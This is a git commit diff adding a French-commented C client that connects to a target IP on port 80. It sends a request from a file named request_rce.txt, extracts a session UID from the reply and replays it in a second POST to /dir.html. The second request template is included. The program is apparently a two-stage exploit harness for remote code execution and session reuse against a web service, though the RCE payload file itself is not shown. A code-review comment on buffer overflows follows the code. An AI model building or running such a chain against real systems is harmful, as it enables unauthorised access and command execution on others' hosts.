hexplor
2026-04-26 04:10:02 +02:00
parent 904f9d9ddb
commit 2ca0abe734
2 changed files with 242 additions and 71 deletions
+224 -70
@@ -3,79 +3,233 @@
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <string.h> #include <string.h>
#include <unistd.h>
int main(int argc, char** argv){ void envoie_request(void);
if (argc != 2){ void recevoir_request(void);
printf("u must specifie IP addr\n"); void recup_uid(void);
exit(1);
}
printf("target = %s\n", argv[1]);
int domain = AF_INET;
int type = SOCK_STREAM;
int fd = socket(domain, type, 0);
printf("fd = %d\n", fd);
struct sockaddr_in dest_addr; int creer_et_connecter_socket(const char* ip_addr) {
memset(&dest_addr, 0, sizeof(dest_addr)); int domain = AF_INET;
dest_addr.sin_family = AF_INET; int type = SOCK_STREAM;
dest_addr.sin_port = htons(80); int fd = socket(domain, type, 0);
dest_addr.sin_addr.s_addr = inet_addr(argv[1]); if (fd < 0) {
printf("Erreur création socket\n");
return -1;
}
printf("fd = %d\n", fd);
int ret = connect(fd,(struct sockaddr*)&dest_addr, sizeof(dest_addr)); struct sockaddr_in dest_addr;
printf("ret_connect = %d\n", ret); memset(&dest_addr, 0, sizeof(dest_addr));
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(80);
dest_addr.sin_addr.s_addr = inet_addr(ip_addr);
FILE* fichier_out = fopen("request_rce.txt", "r"); int ret = connect(fd, (struct sockaddr*)&dest_addr, sizeof(dest_addr));
fseek(fichier_out, 0, SEEK_END); if (ret < 0) {
printf("Erreur connexion\n");
close(fd);
return -1;
}
printf("ret_connect = %d\n", ret);
return fd;
int size = fichier_out->_offset; }
char* file_buffer = malloc(size);
void envoyer_requete(int fd, const char* fichier_requete) {
fseek(fichier_out, 0, SEEK_SET); FILE* fichier_out = fopen(fichier_requete, "r");
fread(file_buffer, 1, size, fichier_out); if (!fichier_out) {
printf("Erreur ouverture fichier: %s\n", fichier_requete);
for (int i = 0; i < size; i++){ return;
char c = file_buffer[i]; }
if (c == '\n')
send(fd, "\r\n", 2, 0); fseek(fichier_out, 0, SEEK_END);
else long size = ftell(fichier_out);
send(fd, &c, 1, 0); char* file_buffer = malloc(size + 1);
}
send(fd, "\r\n", 2, 0); fseek(fichier_out, 0, SEEK_SET);
fread(file_buffer, 1, size, fichier_out);
printf("recv:\n"); file_buffer[size] = '\0';
char c = 0;
int n = 0; printf("\n--- Envoi requête depuis %s ---\n", fichier_requete);
char* text = calloc(1, 1);
int len = 0; for (int i = 0; i < size; i++) {
while (( n = recv(fd, &c, 1, 0)) > 0){ char c = file_buffer[i];
len = strlen(text) + 2; if (c == '\n')
text = realloc(text, len); send(fd, "\r\n", 2, 0);
text[len - 2] = c; else
text[len - 1] = 0; send(fd, &c, 1, 0);
} }
int index = 0; send(fd, "\r\n", 2, 0);
char uid[400];
while (text[index]){ free(file_buffer);
if (text[index] == 'U'){ fclose(fichier_out);
if (strncmp(text + index, "UID=", 4) == 0){ }
printf("pattern found\n");
index += 4; void recevoir_reponse(int fd, char** reponse, int* taille) {
int j = 0 ; char c = 0;
while(text[index] && text[index] != ';' && text[index] != '\r' && text[index] != '\n'){ int n = 0;
uid[j] = text[index]; char* text = calloc(1, 1);
j++; int len = 0;
index++;
} printf("\n--- Réponse reçue ---\n");
uid[j + 1] = 0;
break; struct timeval tv;
} tv.tv_sec = 5;
} tv.tv_usec = 0;
index++; setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
} while ((n = recv(fd, &c, 1, 0)) > 0) {
printf("uid=%s\n", uid); printf("%c", c);
fclose(fichier_out); len = strlen(text) + 2;
free(file_buffer); text = realloc(text, len);
return 0; text[len - 2] = c;
text[len - 1] = 0;
}
printf("\n--- Fin réponse ---\n");
*reponse = text;
*taille = len;
}
char* extraire_uid(const char* reponse) {
int index = 0;
char* uid = malloc(400);
memset(uid, 0, 400);
while (reponse[index]) {
if (reponse[index] == 'U') {
if (strncmp(reponse + index, "UID=", 4) == 0) {
printf("\nPattern UID= trouvé\n");
index += 4;
int j = 0;
while (reponse[index] && reponse[index] != ';' &&
reponse[index] != '\r' && reponse[index] != '\n') {
uid[j] = reponse[index];
j++;
index++;
}
uid[j] = 0;
break;
}
}
index++;
}
if (strlen(uid) == 0) {
printf("UID non trouvé dans la réponse\n");
free(uid);
return NULL;
}
printf("UID extrait = %s\n", uid);
return uid;
}
void envoyer_requete_dir_avec_token(int fd, const char* fichier_requete, const char* uid) {
FILE* fichier_out = fopen(fichier_requete, "r");
if (!fichier_out) {
printf("Erreur ouverture fichier: %s\n", fichier_requete);
return;
}
fseek(fichier_out, 0, SEEK_END);
long size = ftell(fichier_out);
char* file_buffer = malloc(size + 1);
fseek(fichier_out, 0, SEEK_SET);
fread(file_buffer, 1, size, fichier_out);
file_buffer[size] = '\0';
printf("\n--- Envoi requête DIR avec UID: %s ---\n", uid);
for (int i = 0; i < size; i++) {
char c = file_buffer[i];
printf("%c", c);
if (c == 'U') {
if (strncmp(file_buffer + i, "UID=", 4) == 0) {
send(fd, file_buffer + i, 4, 0);
send(fd, uid, strlen(uid), 0);
send(fd, "\r\n", 2, 0);
printf("ID=%s", uid);
i += 3;
continue;
}
}
else if (c == '\n') {
send(fd, "\r\n", 2, 0);
}
else {
send(fd, &c, 1, 0);
}
}
send(fd, "\r\n\r\n", 4, 0);
free(file_buffer);
fclose(fichier_out);
}
int main(int argc, char** argv) {
if (argc != 2) {
printf("Tu dois spécifier l'adresse IP\n");
exit(1);
}
printf("target = %s\n", argv[1]);
printf("\n========== PREMIÈRE REQUÊTE (RCE) ==========\n");
int fd = creer_et_connecter_socket(argv[1]);
if (fd < 0) {
exit(1);
}
envoyer_requete(fd, "request_rce.txt");
char* reponse1 = NULL;
int taille1 = 0;
recevoir_reponse(fd, &reponse1, &taille1);
char* uid = extraire_uid(reponse1);
close(fd);
if (!uid) {
printf("Impossible d'extraire l'UID, arrêt du programme\n");
free(reponse1);
exit(1);
}
printf("\nUID récupéré avec succès: [%s]\n", uid);
printf("\n========== DEUXIÈME REQUÊTE (DIR) ==========\n");
int fd2 = creer_et_connecter_socket(argv[1]);
if (fd2 < 0) {
free(uid);
free(reponse1);
exit(1);
}
envoyer_requete_dir_avec_token(fd2, "request_dir_with_token.txt", uid);
char* reponse2 = NULL;
int taille2 = 0;
recevoir_reponse(fd2, &reponse2, &taille2);
if (reponse2 && strlen(reponse2) > 0) {
printf("\n--- RÉPONSE DIR COMPLÈTE ---\n");
printf("%s\n", reponse2);
} else {
printf("\nAucune réponse reçue pour la requête DIR\n");
}
close(fd2);
free(uid);
free(reponse1);
free(reponse2);
return 0;
} }
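Review bot: In `extraire_uid` the copy loop `while (reponse[index] && reponse[index] != ';' && reponse[index] != '\r' && reponse[index] != '\n')` writes `uid[j]` with no bound on `j`, while `uid` is a fixed `malloc(400)`; a response whose `UID=` value runs longer than 399 bytes before a `;` or line end overflows the heap buffer. The loop should stop at the buffer size as well, `while (j < 399 && reponse[index] && reponse[index] != ';' &&`, so that the trailing `uid[j] = 0;` also stays in bounds (the peer controls that value, so the bound matters). In `recevoir_reponse` the line `text = realloc(text, len);` overwrites the only pointer to the buffer, so a failed `realloc` leaks it and the next line dereferences NULL; use a temporary, `char *tmp = realloc(text, len); if (!tmp) { free(text); *reponse = NULL; *taille = 0; return; } text = tmp;`. The same function computes `strlen(text)` on every received byte, which makes reading a large response quadratic; tracking the length in `len` instead of recomputing it would avoid that. Note also that neither `envoyer_requete` nor `envoyer_requete_dir_avec_token` checks the results of `ftell`, `malloc` or `fread` before indexing `file_buffer[size]`, so an unreadable or empty file leads to a write through an unchecked pointer.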
+17
@@ -0,0 +1,17 @@
POST /dir.html HTTP/1.1
Host: localhost
sec-ch-ua-platform: "Windows"
Accept-Language: fr-FR,fr;q=0.9
sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/main.html
Accept-Encoding: gzip, deflate, br
Cookie: client_lang=french; viewmode=0; UID=
Connection: keep-alive